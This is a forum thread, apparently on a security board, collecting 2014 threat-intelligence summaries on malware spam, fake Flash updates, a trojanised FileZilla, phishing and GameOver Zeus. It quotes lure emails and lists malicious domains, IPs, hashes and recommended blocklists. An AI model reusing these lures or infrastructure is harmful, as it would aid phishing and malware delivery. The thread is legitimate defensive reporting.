Received: Wednesday, January 22, 2014 at 11:31 AM
Pages: 5
To view this message, please open the attachment
Thank you for using RingCentral.

Screenshot: https://lh3.ggpht.com/-96SG-7HQH2o/UufLIJSx1-I/AAAAAAAACdo/r6-QzTUmUtM/s1600/ringcentral.png

Attached is a file fax.zip which in turn contains a malicious exectable fax.doc.exe with an icon to make it look like a Word document. The VirusTotal detection rate for the document is 10/50*, and the Malwr analysis** shows an attempted callback to ren7oaks .co .uk on 91.238.164.2 (Enix Ltd, UK). The executable then downloads an apparently encrypted file..."
* https://www.virustotal.com/en-gb/file/4a26797889d35d056272de85253874ebbf389fad3b6a1b4a44dad0198580920f/analysis/1390921856/

** https://malwr.com/analysis/NTIxYTE4ZTFhZmU4NGExZWFhYjA5OWFhZmUyYzlmOTQ/
___

Fake flash update via .js injection and SkyDrive
- http://blog.dynamoo.com/2014/01/ongoing-fake-flash-update-via-js.html
28 Jan 2014 - "... ongoing injection attacks that were leading to Adscend Media LLC ads. Adscend say that the affiliate using their ad system was banned, although the ad code is -still- showing in the injection attacks themselves. F-Secure also covered the attacks* from a different aspect... this infection is -still- current..."
(More detail at the dynamoo URL above.)

* http://www.f-secure.com/weblog/archives/00002659.html

> http://www.f-secure.com/weblog/archives/5_flash1.PNG
___

Fake Flash Update aimed at Turkish users
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-adobe-flash-update-aimed-at-turkish-users/
Jan 27, 2014 - "... A recent attack that we found starts off with a video link sent to users via Facebook’s messaging system (sent in Turkish). This “video” prompts users to install a Flash Player update; it actually installs a browser extension that blocks access to various antivirus sites. It also sends a link to the “video” to the victim’s Facebook friends via the messaging system, restarting the cycle. This targeting appears to have worked: based on feedback from the Smart Protection Network, 93% of those who accessed pages related to this attack were from Turkey. The browser extension pushed to users was in the format used by Chromium-based browsers like Google Chrome. It would -not- work in other browsers, like Internet Explorer and Mozilla Firefox. It also stops the user from accessing the extension settings page, to prevent the user from removing or disabling the extension.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/turkishflashplayer.jpg
... The fake update, detected as TROJ_BLOCKER.J, installs the extension (detected as JS_BLOCKER.J) that blocks the antivirus websites. JS_BLOCKER.J then downloads a malicious script which is used to send the Facebook messages with the link to the video. This script is detected as HTML_BLOCKER.K. In addition to Facebook messages, Twitter accounts “promoting” this page were also spotted:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/turkishtwitteraccountupdated.jpg
Turkey is one of the world’s most active Facebook-using countries, with 19 million daily active users and 33 million monthly active users... this attack’s behavior – blocking antivirus sites – ... would leave them vulnerable to future attacks..."
___

Malformed FileZilla - login stealer
- http://blog.avast.com/2014/01/27/malformed-filezilla-ftp-client-with-login-stealer/
Jan 27, 2014 - "Beware of malformed FileZilla FTP client versions 3.7.3 and 3.5.3. We have noticed an increased presence of these malware versions of famous open source FTP clients. The first suspicious signs are bogus download URLs. As you can see, the installer is mostly hosted on -hacked- websites with -fake- content (for example texts and user comments are represented by images.)
> https://blog.avast.com/wp-content/uploads/2014/01/web_01.jpg
Malware installer GUI is almost identical to the official version. The only slight difference is version of NullSoft installer where malware uses 2.46.3-Unicode and the official installer uses v2.45-Unicode. All other elements like texts, buttons, icons and images are the same. The installed malware FTP client looks like the official version and it is fully functional! You can’t find any suspicious behavior, entries in the system registry, communication or changes in application GUI.
The only differences that can be seen at first glance are smaller filesize of filezilla.exe (~6,8 MB), 2 dll libraries ibgcc_s_dw2-1.dll and libstdc++-6.dll (not included in the official version) and information in “About FileZilla” window indicates the use of older SQLite/GnuTLS versions. Any attempt to update the application fails, which is most likely a protection to prevent overwriting of malware binaries.
> https://blog.avast.com/wp-content/uploads/2014/01/about_windows.jpg
We found a hardcoded connection detail stealer after deeper analysis. Malware authors abuse open source code and add their own stealer function to the main code... The algorithm is part of a malformed FileZilla.exe binary, therefore sending stolen log in details which bypasses the firewall. The whole operation is very quick and quiet. Log in details are sent to attackers from the ongoing FTP connection only once. Malware doesn’t search bookmarks or send any other files or saved connections... Malware authors use very powerful and inconspicuous methods to steal FTP log in credentials in this case... We -strongly- recommend to download any software only from official, well-known or trusted sources. Avoid strange looking websites and portals offering software via their own downloaders or installers containing bundled adware and PUP applications..."

:fear: :mad:

AplusWebMaster
2014-01-29, 18:04
FYI...

Fake "Voice Message" SPAM (again)
- http://blog.dynamoo.com/2014/01/voice-message-from-unknown-spam-again.html
29 Jan 2014 - "This -fake- voice message spam comes with a malicious attachment:
Date: Wed, 29 Jan 2014 14:45:36 +0100 [08:45:36 EST]
From: Administrator [docs0@ victimdomain .net]
Subject: Voice Message from Unknown (644-999-4348)
Unity Messaging System
- - -Original Message- - -
From: 644-999-4348
Sent: Wed, 29 Jan 2014 14:45:36 +0100
To: [redacted]
Subject: Important Message to All Employees

Attached is an archive Message.zip which in turn contains a malicious executable VoiceMessage.exe which has a VirusTotal detection rate of just 6/50*. Automated analysis tools... show attempted connections to kitchenrescue .com on 184.107.74.34 (iWeb, Canada) and ask-migration .com on 173.192.21.195 (Softlayer, US). In particular, it attempts to download some sort of -encrypted- file [donotclick]kitchenrescue .com/login.kitchenrescue.com/images/items/wav.enc which I have not been able to identify."
* https://www.virustotal.com/en/file/d28477812ad468a2965e8962b876f410a1b52074bc22b0122d22ab69950b720c/analysis/1391006188/

- https://www.virustotal.com/en/ip-address/184.107.74.34/information/

- https://www.virustotal.com/en/ip-address/173.192.21.195/information/
___

Neutrino delivers Fake Flash malware hosted on SkyDrive
- http://blog.malwarebytes.org/online-security/2014/01/neutrino-delivers-fake-flash-malware-hosted-on-skydrive/
Jan 29, 2014 - "As cloud computing becomes more popular, malware authors are also taking interest in using this technology to store their own files—except, of course, their files are usually bad. SkyDrive (recently renamed to OneDrive) is Microsoft’s cloud storage solution, and competes directly with other big-name storage products like Google Drive and Dropbox, all of which provide a convenient solution to accessing your files from virtually any location with internet access. Recently, I found a downloader collected from our honeypot that appears as a -fake- Flash Player installer. These type of programs usually deliver malware and are very successful at making people believe they’re installing or updating the real Flash Player. This particular downloader file currently is detected by 9/50 vendors on Virustotal* ... The downloader binary was a payload from the Neutrino Exploit Kit and delivered via a Java exploit... When the file runs, it beacons out to the SkyDrive URL and presents a dialog that states it’s installing Flash Player, and then says “Installation Finished!” if everything goes well.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/flash_install_finished.jpg
I visited the download server multiple times and managed to get different samples, each with their own icon (including a creepy skull). Meaning the samples stored on the SkyDrive folder are constantly being updated.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/flashplayer_samples.png
... To be fair to Microsoft, this isn’t the only instance where cloud storage was used for bad things. Last November, we reported on a malicious script that was hosted on Google Drive, and similar things have happened with Dropbox. Regardless, it appears more security measures need to be into place to prevent various malicious files and programs from being uploaded to cloud storage services."
* https://www.virustotal.com/en/file/2e049271a6546113e9500a3db07ecd435ba9b4b61857a7fd04909232c9135be8/analysis/
___

Fake Browser updates ...
- http://blog.malwarebytes.org/fraud-scam/2014/01/dont-fall-for-fake-browser-update-warnings/
Jan 28, 2014 - "... Any message asking end users to update browsers to ward off security issues can cause problems both at home and in the workplace. Neither “Relative who knows about computers” or the stressed IT guy from the fourth floor wants to waste time rolling back / uninstalling / deleting things from the target PC... I came across a fake browser update site doing the rounds located at
newbrowserversion(dot)org
which has pages for Chrome (C), Firefox (F) and IE (I) users... Here’s what you can expect to see on each of the three pages.
Chrome: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate2.jpg
.
Firefox: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate3.jpg
.
IE: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate4.jpg
.
Regardless of page viewed, they all say the same thing... Should the end-user run the executable file (and all three have a different MD5) the install procedure kicks into gear. Sort of. We’re presented with the standard splash screen, and one would expect to see various offers, programs, maybe the odd toolbar... If you want to check the update status of your browser, rely on the browser itself rather than third-party websites offering up random downloads. More often than not, your browser will tell you about updates by clicking into “Help” and / or “About this browser” options in the various settings menus..."

68.233.240.26
- https://www.virustotal.com/en/ip-address/68.233.240.26/information/

:mad: :mad:

AplusWebMaster
2014-01-30, 13:15
FYI...

Fake Vodafone MMS SPAM - malicious attachment
- http://blog.dynamoo.com/2014/01/fake-vodafone-mms-spam-comes-with.html
30 Jan 2014 - "This -fake- Vodafone MMS spam comes with a nasty payload:
Date: Thu, 30 Jan 2014 03:55:04 -0500 [03:55:04 EST]
From: mms.service6885@ mms .Vodafone .co .uk
Subject: image Id 312109638-PicOS97F TYPE==MMS
Received from: 447219637920 | TYPE=MMS

Despite the Vodafone references in the header, this message comes from a random -infected- PC somewhere and not the Vodafone network. The email doesn't quite render properly in my sample:
> https://lh3.ggpht.com/-PSCY3ZpjEqc/Uuod0tnNmZI/AAAAAAAACeM/xFBm1YwPsAc/s1600/vodafone-mms.png
The spam is probably preying on the fact that most people have heard of MMS but very rarely use it. Attached is a file IMG0000008849902.zip which in turn contains a malicious executable IMG0000008849902.exe, this has a VirusTotal detection rate of just 2/50*. Automated analysis tools are inconclusive... as the sample appears to time out."
* https://www.virustotal.com/en-gb/file/971f2effb1e8b462a449d82c2660a8536ab113b0bb0fd1938591d4703a47809e/analysis/1391073258/
___

Twitter Follower Scam ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/does-the-twitter-follower-scam-actually-work/
Jan 30 2014 - "... This -scam- tries to attract potential victims by using tweets with the phrase “GET MORE F0LL0WERS” and a URL that is apparently from Google. (In this particular case, Google is just used as a -redirector- to the scammer’s site.) It also uses Twitter’s Discover feature and trending topics to boost its visibility. It also uses tweets that mention random Twitter users.
Sample tweets promoting the site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/twitter1.jpg
When users click the link in the post, they will be redirected to a “get free followers” site. The site offers two options—a free and a premium service. The free option requires users to authorize a Twitter app named “LAAY PAAY” created by the scammers; this will grant them access to the user’s Twitter account. After the user is returned to the scam site from the app authorization process, the site will show a “processing” page. The user will gain random Twitter followers, including those with private accounts. The premium service boasts new followers per minute, no ads, and instant activation. This service costs five euros and can be paid via PayPal.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/twitter2.jpg
What’s the catch? Yes, they get new followers, but these followers are other users who signed up for this service as well. By agreeing to the service, their accounts will also be used to follow other accounts as well. In addition, spam tweets will also be sent from the victim’s Twitter account. Even paying five euros will not stop these spam tweets. Note that to get more followers you have to log in repeatedly (otherwise you drop off the “list”), repeating the whole cycle... Gaining access to Twitter accounts and sending spam tweets is not the only goal of the scammers here. They also load various advertising-laden affiliate sites in the background, in order to gain pageviews and thus, revenue for the owners of the ads. We’ve seen -35- separate domains in this attack... Users are encouraged to -avoid- clicking links on social media posts unless the source can be verified. Users should also avoid giving access to their social media accounts unless the sites are established and well-known. Lastly, they should always remember that “free” services often aren’t. They may ask for something in exchange, be it information or access to accounts..."
___

s15443877[.]onlinehome-server[.]info ? ...
- http://blog.dynamoo.com/2014/01/wtf-is-s15443877onlinehome-serverinfo.html
30 Jan 2014 - "Something that caught my eye was this Google Safebrowsing diagnostic for [donotclick]s15443877.onlinehome-server .info * ... Not only are (exactly) one third of the pages crawled hosting -malware- but there are a staggering -198- domains spreading it. Usually it's just a handful of sites, but this is the most I've ever seen. VirusTotal also shows some historical evil** going on with the IP of 212.227.141.247 (1&1, Germany) and a Google of the site contents shows thousands of hits of what appears to be scraped content in Spanish. It's hard to say just what this site is, but with Google diagnostics like that then it is unlikely to be anything good and -blocking- s15443877.onlinehome-server .info or 212.227.141.247 might be prudent."
* http://www.google.com/safebrowsing/diagnostic?site=s15443877.onlinehome-server.info/
"... over the past 90 days, 582 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2014-01-29, and the last time suspicious content was found on this site was on 2014-01-29. Malicious software includes 166 scripting exploit(s), 166 trojan(s), 89 exploit(s). Successful infection resulted in an average of 5 new process(es) on the target machine. Malicious software is hosted on 198 domain(s)... 155 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site..."

** https://www.virustotal.com/en-gb/ip-address/212.227.141.247/information/

AS8560 (ONEANDONE-AS)
- http://www.google.com/safebrowsing/diagnostic?site=AS:8560
___

Fake "Last Month Remit" SPAM
- http://blog.dynamoo.com/2014/01/last-month-remit-spam.html
30 Jan 2014 - "This -fake- "Last Month Remit" spam does a pretty good job of looking like it comes from your own organisation..
Date: Thu, 30 Jan 2014 12:22:05 +0000 [07:22:05 EST]
From: Administrator [victimdomain]
Subject: FW: Last Month Remit
File Validity: Thu, 30 Jan 2014 12:22:05 +0000
Company : http ://[victimdomain]
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls ...

Going to to bother of inserting fake mail headers is odd, because anyone who knew enough to check the headers would probably also realise that the attached ZIP file with an EXE in it was probably bad news. In this case, the attachment is called Remit_[victimdomain].zip which in turn contains a malicious executable called Remit.exe which has an icon that makes it look like a PDF file.
> https://lh3.ggpht.com/-BiMee-Y7Kt4/UupYcxBdSgI/AAAAAAAACe0/qYuzePEaT1Y/s1600/remit2.png
This file has a VirusTotal detection rate of 10/49*. Automated analysis tools... show an attempted connection to poragdas .com on 182.18.143.140 (Pioneer Elabs, India) which is a server that has been seen before, and excelbizsolutions .com on 103.13.99.167 on (CtrlS Private, India).
Recommended blocklist:
103.13.99.167
182.18.143.140
poragdas .com
excelbizsolutions .com "
* https://www.virustotal.com/en-gb/file/7ff43c5448b8edf9f0f373e56709a24719f0a972b381accf76a0f1fa0c324542/analysis/1391089282/

:mad: :fear::fear:

AplusWebMaster
2014-01-31, 15:08
FYI...

Fake Fax2Email SPAM
- http://blog.dynamoo.com/2014/01/windsor-telecom-fax2email-spam.html
31 Jan 2014 - "... another -fake- Fax spam with a malicious payload:
Date: Fri, 31 Jan 2014 10:00:23 +0000 [05:00:23 EST]
From: Windsor Telecom Fax2Email [no-reply@ windsor-telecom .co .uk]
Subject: Fax Message on 08983092722 from FAX MESSAGE
You have received a fax on your fax number: 08983092722 from.
The fax is attached to this email.
PLEASE DO NOT REPLY BACK TO THIS MESSAGE.

Attached is an archive file FAX MESSAGE.ZIP which in turn contains a malicious executable FAX MESSAGE.EXE with a VirusTotal detection rate of 4/50*. Well, I say malicious but both Malwr and Anubis report that the payload does not execute properly, however that might just be an issue with those particular sandboxes and it does -not- mean that it will fail to run on all systems."
* https://www.virustotal.com/en-gb/file/bd18f9369b8e8f7e17f421d07b510c2268a64e0dcd881610f323ea9018120822/analysis/1391163988/
___

Something evil on 192.95.10.208/28
- http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html
31 Jan 2014 - "192.95.10.208/28 (OVH, Canada) is being used to deliver -exploit- kits utlising .pw domains, for an example see this URLquery report*. The following domains are being used in these attacks (although there may be more):
(Long list at the dynamoo URL above.)
The IP forms part of a /28 block belonging to a known bad actor:
NetRange: 192.95.10.208 - 192.95.10.223
CIDR: 192.95.10.208/28
OriginAS: AS16276 ... **
Country: RU
RegDate: 2014-01-24
I believe that these IPs are connected with a black hat host -r5x .org- and IPs with these WHOIS details are very often used in exploit kit attacks. I would -strongly- recommend that you -block- 192.95.10.208/28 in addition to the domains listed above."
* http://urlquery.net/report.php?id=9140970

Diagnostic page for AS16276 (OVH)
** http://google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 5074 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-01-31, and the last time suspicious content was found was on 2014-01-31... we found 776 site(s) on this network... that appeared to function as intermediaries for the infection of 2156 other site(s)... We found 1092 site(s)... that infected 7551 other site(s)..."

- http://centralops.net/co/DomainDossier.aspx
canonical name r5x .org ...
addresses 176.124.111.130 ...
- https://www.virustotal.com/en-gb/ip-address/176.124.111.130/information/
___

Lloyds Banking Group 'Online Access Suspended' Phish
- http://www.hoax-slayer.com/lloyds-online-access-suspended-phishing-scam.shtml
Jan 31, 2014 - "Email that pretends to come from Lloyds Banking Group -claims- that the recipient's online account access has been suspended because login details are incorrectly entered several times... The email is -not- from Lloyds. It is a -phishing- scam designed to trick users into giving their account login details and other personal information to Internet criminals. Example:
> http://www.hoax-slayer.com/images/llyods-phishing-scam-2014.1.jpg
... According to this email, which purports to be from the UK's Lloyds Bank, the recipient's bank account has been suspended. Supposedly, account login details were entered several times, so the bank suspended access in order to protect the customer from online fraud attempts... the email itself is the online fraud attempt. The message is a typical phishing scam. Customers who are taken in by the false claims and click the link as instructed will be taken to a fake website where they will be asked to login to their Lloyds online account. After logging in on what they believe is the genuine Lloyds website, victims may then be asked to provide further personal data such as their credit card details and ID information. At the end of the sequence, victims may be automatically redirected to the genuine Lloyds website. Meanwhile, the criminals can hijack their bank accounts, transfer funds, conduct fraudulent transactions and perhaps even steal their identities..."
- http://www.lloydsbank.com/help-guidance/security/phishing.asp

:fear: :mad:

AplusWebMaster
2014-02-01, 17:48
FYI...

Fake Human Rights SCAM/SPAM ...
- http://blog.dynamoo.com/2014/02/african-human-right-and-refugees.html
1 Feb 2014 - "This spam email is actually part of an advanced fee fraud setup:
From: fernando derossi fernandderossi59@ gmail .com
To: fernandderossi59@ gmail .com
Date: 1 February 2014 13:22
Subject: URGENT FOOD STUFF SUPPLY NEED FOR REFUGEES
Signed by: gmail .com
Dear Sir:
My company has been mandated to look for a company capable of
supplying food stuffs product listed bellow by the AFRICAN HUMAN
RIGHT AND REFUGEES PROTECTION COUNCIL (AHRRPC) for assisting of the
refugee within the war affected countries IN middle east and Africa
like MALI,SYRIA, SOMALIA, CENTRAL AFRICA, and SOUTH SUDAN, which after
going through your company's profile, have decided to know if your company is interested.
Below are the list of food Stuffs and the targeted value needed by (AHRRPC) ...
We will be happy to work with you company only as representing agent
to secure an allocation for your company while in return your company
will give us comission as soon as your receive your contract value. We
will give you more details about the contract when we recieve your reply.
Regards,
Mr.Fernando Derossi
AHRRPC AGENT ...

The email links to a website at www .ahrrpc .8k .com which set off all sorts of -alarms- on my virus scanner, but I think it is just an ad-laden free web hosting site, and purports to be from the African Human Right and Refugees Protection Council (AHRRPC)...
> https://lh3.ggpht.com/-rmNQq0bAL6I/Uu0I-IzIiOI/AAAAAAAACfQ/jt3zycfz6Oo/s1600/ahrrpc.png
Of course, there is no such organisation as this and probably the main thrust of the scam is that there will be an "arrangement fee" payable in order to sell these goods.. and once the fee is paid the scammers will disappear... Give any approaches from the so-called African Human Right and Refugees Protection Council (AHRRPC) a very wide berth. And remember, if you want to verify who a photo actually belongs to then Google Images is an excellent resource."
___

Fake SMS SPAM ...
- http://blog.dynamoo.com/2014/02/unsure-if-you-qualify-for-refund-of-ppi.html
1 Feb 2014 - "... scammers are still at it, pumping away lead generation spam to persuade people to make PPI claims to which they are -not- entitled.

Unsure if you qualify for a refund of PPI paid on a loan or credit card? Reply PPI and we will run a no obligation check or reply STOP to opt out.
TPPCO

In this case the scammers used the contact number +447743623103 but they burn through dozens of SIM cards every day with their illegal spamming operations. If you get one of these, you should forward the spam and the sender's number to your carrier... T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints. You can also report persistent spam like this via the ICO's page on the subject*. With any luck these spammers will end up on the receiving end of a massive fine**."
* http://ico.org.uk/for_the_public/topic_specific_guides/marketing/texts

** http://blog.dynamoo.com/2012/11/gary-mcneish-christopher-niebel-fined.html

:fear::fear: :mad:

AplusWebMaster
2014-02-03, 14:57
FYI...

Something evil on 192.95.7.224/28
- http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html
3 Feb 2014 - "Another OVH Canada range hosting criminal activity, 192.95.7.224/28 is being used for several malicious .pw domains being used to distribute malware (as used in this attack*). The malware domains seem to rotate through subdomains very quickly, possibly in an attempt to block analysis of their payload. This block is carrying out the same malicious activity that I wrote about a few days ago**. OVH have suballocated this IP block to an entity that I believe is connected with black hat host r5x .org.
CustName: Private Customer
Address: Private Residence
City: Penziatki ...
Country: RU
RegDate: 2014-01-24 ...
These IPs are particularly active:
192.95.7.232
192.95.7.233
192.95.7.234
There is nothing of value in this /28 block and I recommend that you -block- the entire IP range plus the following domains (which are all already flagged as being malicious by Google)
Recommended blocklist:
192.95.7.224/28
archerbocce .pw
athleticsmove .pw .."
(Long list of .pw domains at the dynamoo URL above.)
* http://urlquery.net/report.php?id=9205587

** http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html

- https://www.virustotal.com/en/ip-address/192.95.7.232/information/
___

Something evil on 64.120.137.32/27
- http://blog.dynamoo.com/2014/02/something-evil-on-641201373227.html
3 Feb 2014 - "64.120.137.32/27 is a range of IP addresses belonging to Network Operations Center Inc in the US and suballocated to a customer which is currently being used in malware attacks as an intermediate step in sending victims to this malicious OVH range*.You can see an example of some of the badness in action here**. The range was formerly used by a company called TixDepot but may have been hijacked or reassigned. NOC report the following contact details for the block:
network:ID:NET-64.120.137.32/27
network:Auth-Area:64.120.128.0/17
network:network:NET-64.120.137.32/27
network:block:64.120.137.32/27 ...
network:country: US ...
About -half- the domains in this /27 have been flagged as -malicious- by Google, concentrated on the three IP addresses:
64.120.137.53
64.120.137.55
64.120.137.56
I would recommend -blocking- the entire /27, but this is the breakdown by IP address with domains tagged by Google highlighted (there's a plain list here***)"
* http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html

** http://urlquery.net/report.php?id=9196650

*** http://pastebin.com/hHGvXkJa

- https://www.virustotal.com/en/ip-address/64.120.137.53/information/

- https://www.virustotal.com/en/ip-address/64.120.137.55/information/

- https://www.virustotal.com/en/ip-address/64.120.137.56/information/
___

Something evil on 192.95.43.160/28
- http://blog.dynamoo.com/2014/02/something-evil-on-192954316028.html
3 Feb 2014 - "More badness hosted by OVH Canada, this time 192.95.43.160/28 which contains pretty much the same set of evil described here*. Here is a typical IP flagged by VirusTotal** and a failed resolution by URLquery*** which frankly gives enough information to make it suspicious. However, the key thing is the registrant details which have been used in -many- malware attacks before****.
CustName: Private Customer
Address: Private Residence
Country: RU
RegDate: 2014-01-24...
I can see the following .pw domains active in this range:
basecoach .pw
crewcloud .pw
boomerangfair .pw
kickballmonsoon .pw
martialartsclub .pw
runningracer .pw
All those domains are flagged by Google as malicious and I recommend that you block them along with 192.95.43.160/28."
* http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html

** https://www.virustotal.com/en-gb/ip-address/192.95.43.160/information/

*** http://urlquery.net/report.php?id=9209750

**** http://blog.dynamoo.com/search?q=Penziatki
___

Fake inTuit/TurboTax/IRS Refund Notice
- http://security.intuit.com/alert.php?a=97
2/3/14 - "People are receiving -fake- emails with the title "IRS Refund Notice":
Screenshot: http://security.intuit.com/images/phish97_tt_refund.jpg
This is the end of the -fake- email.
Steps to Take Now:
Do -not- open the attachment in the email.
-Delete- the email..."
___

German email accounts hacked - Scams circulate ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/scams-circulate-after-german-email-accounts-get-hacked/
Feb 3, 2014 - "Recently, the German Federal Office for Information Security disclosed that the email accounts of up to 16 million users had been compromised. The computers of these users were infected with information-stealing malware which were used to steal these login credentials. The German government has set up a page where users can check if their email accounts have been compromised*. We recommend that users in Germany check their accounts, as we’re seeing a re-occurrence of certain -scams- which rely on compromised email accounts...
Protecting email accounts should be a top priority, considering the amount of sensitive information stored in them and the other accounts that can be controlled via password resets. Users should remember a few key safety tips:
• Always use different complex passwords or passphrases for different accounts. Password managers can help create and manage multiple online accounts.
• Opt for two-factor authentication when possible.
• Only log in using secure and trusted devices. Think twice before logging in from public devices such as Internet cafes.
• Users can also opt for encryption services for added protection."
* https://www.sicherheitstest.bsi.de/
___

ANZ 'Upgrade to New System' Phish ...
- http://www.hoax-slayer.com/anz-upgrade-new-system-phishing-scam.shtml
Feb 3, 2014 - "Email pretending to be from large Australian and New Zealand bank ANZ claims that customers must click a link to upgrade to a new system technology designed to give users maximum protection... The email is a phishing scam that tries to trick users into divulging their personal information to criminals. The "Log on" button opens a -bogus- website designed to steal the user's ANZ account login details...
> http://www.hoax-slayer.com/images/anz-upgrade-phishing-2014-1.jpg
According to this email, which purports to be from the ANZ bank, customers are required to upgrade to a new system by logging into their accounts. The message claims that the new system will offer maximum protection and invites users to click a "Log on" button. The email is formatted with ANZ's logo and colour scheme to make it appear more genuine... the message is -not- from ANZ and the claim that users must login due to a system upgrade is untrue. The email is a simple phishing scam designed to grab account login credentials from unsuspecting ANZ customers... If users enter their customer number and password on the fake page and click the "Log on" button, they will be automatically redirected to the genuine ANZ site. They may believe that they have successfully "upgraded" to the new system and may remain unaware that they have been scammed until the next time they try to login... ANZ has published information about phishing scams on its website*..."
* http://www.anz.com/auxiliary/security-centre/fraud-security-centre/protect-yourself/identifying-fraud/internet-fraud/
___

Fake Evernote - Malware Email
- http://www.hoax-slayer.com/evernote-image-sent-malware-email.shtml
Feb 2, 2014 - "Email purporting to be from note taking application Evernote claims that an image has been sent and invites users to click a link to view the image... Evernote did not send the email and has no connection to it. The message is a criminal ruse designed to trick people into downloading and installing malware...
> http://www.hoax-slayer.com/images/evernote-image-malware-1.jpg
According to this email, which purports to be from popular note taking application Evernote, an image addressed to the recipient has been sent. The message includes a clickable "Go to Evernote" button. The name of the supposed image is also clickable. However, Evernote did not send the email. Nor did it send an image as claimed. Clicking the links in the message will not open an image stored in Evernote as suggested in the message. Both links lead to a compromised website that harbours -malware-..."

:mad: :mad:

AplusWebMaster
2014-02-04, 13:08
FYI...

GameOver Zeus now using Encryption to bypass detection
- http://threatpost.com/gameover-zeus-now-using-encryption-to-bypass-detection/104019
Feb 3, 2014 - "Cybercriminals have begun to tweak the way the GameOver Zeus Trojan is being delivered to users’ machines, making it easier for the banking malware to evade detection and steal victims’ credentials. To get the job done the malware has been working in tandem with the malware Upatre. For about a week now criminals have been changing the .exe files Upatre downloads to non-executable .enc files. According to a computer forensics expert, this is how the malware, which spreads via spam e-mails and malicious attachments, can avoid being spotted by firewalls, Web filters and other security defenses. Gary Warner, a director of research in computer forensics at the University of Alabama at Birmingham posted* about the trick and included a handful of spam email examples on his Cybercrime & Doing Time blog yesterday... Warner noticed the trend when a colleague, Brendan Griffin, a malware analyst at the firm Malcovery sent along a series of -spam- messages, some purporting to come from the Better Business Bureau, Skype and the IRS, among other agencies, spreading the malware..."
* http://garwarner.blogspot.com/2014/02/gameover-zeus-now-uses-encryption-to.html

- https://www.virustotal.com/en/file/06c56ba2c25e2a998876b83a3ede7fb3273f9f9eb8aff1365955ba4d8d72fee8/analysis/
File name: vti-rescan
Detection ratio: 0/50
Analysis date: 2014-02-05

- https://slashdot.org/topic/datacenter/stop-botnets-by-knowing-a-zombie-from-a-user/
Feb 4, 2014 - "... The newest version of the GameOver Zeus variant slipped through -50- anti-virus filters at online anti-virus service VirusTotal by encrypting its malicious payload and changing the name to make it look inert, according to security researcher Gary Warner at Malcovery, who blogged about it Feb. 2. “Why? Well, because technically, it isn’t malware. It doesn’t actually execute!” Warner wrote*. “All Windows EXE files start with the bytes “MZ”. These files start with “ZZP”. They aren’t executable, so how could they be malware? Except they are.” Rather than launching its own malicious payload, the attachment downloads an encrypted file ending in .enc, then decrypts it, renames it and stores the new payload somewhere else on the infected machine – as an executable scheduled to launch sometime later. It was easier when botnets used IRC to control malware-infected zombies, but the state of the art is now to use TCP and HTTP, which helps botnets hide their tracks among gigabytes of legitimate HTTP traffic..."

- http://www.fortiguard.com/legacy/analysis/zeusanalysis.html
___

Email malware at 5-year high - Jan 2014
- http://blogs.appriver.com/Blog/bid/101194/January-in-Review
Feb 3, 2014 - "... a few metrics that we saw in January:
> http://blogs.appriver.com/Portals/53864/images/virus_traffic-resized-600.jpg
Though traffic was close to normal, the four day -spike- from the 7th-10th was enough to push this month’s total virus message count to the highest monthly total since Q3 of 2008. (269,108,311 virus-laden messages were quarantined in January 2014.) The traffic on Jan.7th-10th was roughly -40- times the daily average, which is typically about 2+million emails containing a virus attachment..."

:fear::fear: :mad:

AplusWebMaster
2014-02-05, 12:32
FYI...

Fake Barclays transaction SPAM
- http://blog.dynamoo.com/2014/02/barclays-transaction-notification-spam.html
5 Feb 2014 - "This -fake- Barclays spam comes with a malicious payload:
Date: Wed, 5 Feb 2014 03:02:52 -0500 [03:02:52 EST]
From: Barclays Bank [support@ barclays .net]
Subject: Barclays transaction notification #002601
Transaction is completed. £9685 has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.
Barclays is a trading name of Barclays Bank PLC and its subsidiaries. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register No. 122702). Registered in England. Registered Number is 1026167 with registered office at 1 Churchill Place, London E14 5HP.

Attached is a file Payment receipt Barclays PA77392733.zip which is turn contains a malicious executable Payment receipt Barclays PA77392733.exe with a surprisingly poor VirusTotal detection rate of just 1/51* (only Sophos detects it). Automated analysis tools are pretty inconclusive about the payload... with only the Malwr report** having any real detail."
* https://www.virustotal.com/en-gb/file/26b592c1954cedcb25592a50cff632f5e7633c579137099fb532083d3fab652a/analysis/1391591290/

** https://malwr.com/analysis/OGIzYjYzNTQ1ZTJjNDRjYmJlZjZlMjdkMGRlOTc5ODI/
___

Hacked Within Minutes: Sochi Visitors Face Internet Minefield
- http://www.nbcnews.com/watch/nightly-news/hacked-within-minutes-sochi-visitors-face-internet-minefield-137647171983
Feb 4, 2014 - "... they should have “no expectation of privacy,” even in their hotel rooms."
___

Fake "LloydsLink reference" SPAM - malicious attachment
- http://blog.dynamoo.com/2014/02/lloydslink-reference-spam-comes-with.html
5 Feb 2014 - "This -fake- Lloyds TSB spam comes with a malicous payload:
